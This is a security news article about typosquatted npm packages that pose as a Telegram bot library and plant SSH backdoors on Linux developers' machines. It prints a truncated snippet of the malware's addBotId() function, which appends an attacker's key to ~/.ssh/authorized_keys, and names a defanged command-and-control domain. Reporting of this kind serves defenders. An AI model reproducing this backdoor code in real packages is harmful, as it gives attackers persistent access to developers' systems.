Malicious npm Packages Attacking Linux Developers to Install SSH Backdoors

A concerning new supply chain attack has emerged targeting Linux developers who work with Telegram’s bot ecosystem.

Discovered in early 2025, several malicious npm packages have been masquerading as legitimate Telegram bot libraries to deliver SSH backdoors and exfiltrate sensitive data from unsuspecting developers.

These typosquatted packages collectively accumulated approximately 300 downloads over several months, creating a significant security threat despite their relatively modest installation numbers.

The attack specifically targets the widely used node-telegram-bot-api library, which has over 4.17 million downloads.

The malicious variants—node-telegram-utils, node-telegram-bots-api, and node-telegram-util—appear virtually identical to the legitimate package, copying its documentation, functionality, and even linking back to the authentic GitHub repository with its 19,000+ stars to enhance credibility and deceive developers.

Socket.dev researchers identified that these packages implement a sophisticated “starjacking” technique, where they link their homepage back to the legitimate GitHub repository to borrow trust from the original project’s reputation.

This deception makes the malicious packages particularly difficult to identify during casual inspection, as they display the same star count as the legitimate library.

Upon installation in a Linux environment, the malicious packages automatically execute a hidden function called addBotId() whenever the constructor is called.

This function performs a platform check and, if Linux is detected, proceeds with its malicious payload without requiring any user interaction.

The attack specifically targets developer environments where npm packages are frequently installed during project setup or maintenance.

Infection Mechanism and Persistence

The malware’s key capability lies in its SSH backdoor implementation.

When executed on Linux systems, the malicious code modifies the ~/.ssh/authorized_keys file by appending attacker-controlled SSH keys, creating a persistent access channel that survives package removal:

// Node.js core modules used by the snippet (the imports are implied by the original; getBotId() is the package's own helper, not shown, that resolves the host's public IP address)
const os = require('os');
const path = require('path');

async function addBotId() {
    const username = os.userInfo().username;
    // Attacker-controlled public key, truncated in the published snippet
    const publicKey = `ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0eFAxoea78gXpURdj7ufXx1LVEOoVKawxRnwAghXH`;
    if (os.platform() === 'linux') {   // payload only fires on Linux hosts
        try {
            const ipAddress = await getBotId();
            const sshDir = path.join(os.homedir(), '.ssh');
            const authorizedKeysPath = path.join(sshDir, 'authorized_keys');
            // Code continues to add SSH keys and exfiltrate data

Once the key has been appended, the attacker can log in over SSH as the affected user; because the key lives in the user's home directory rather than in node_modules, uninstalling the package does not revoke that access.

The code not only injects multiple SSH keys for redundant access but also exfiltrates the victim’s IP address and username to a command-and-control server at solana[.]validator[.]blog, allowing attackers to inventory compromised systems for further exploitation or data theft.
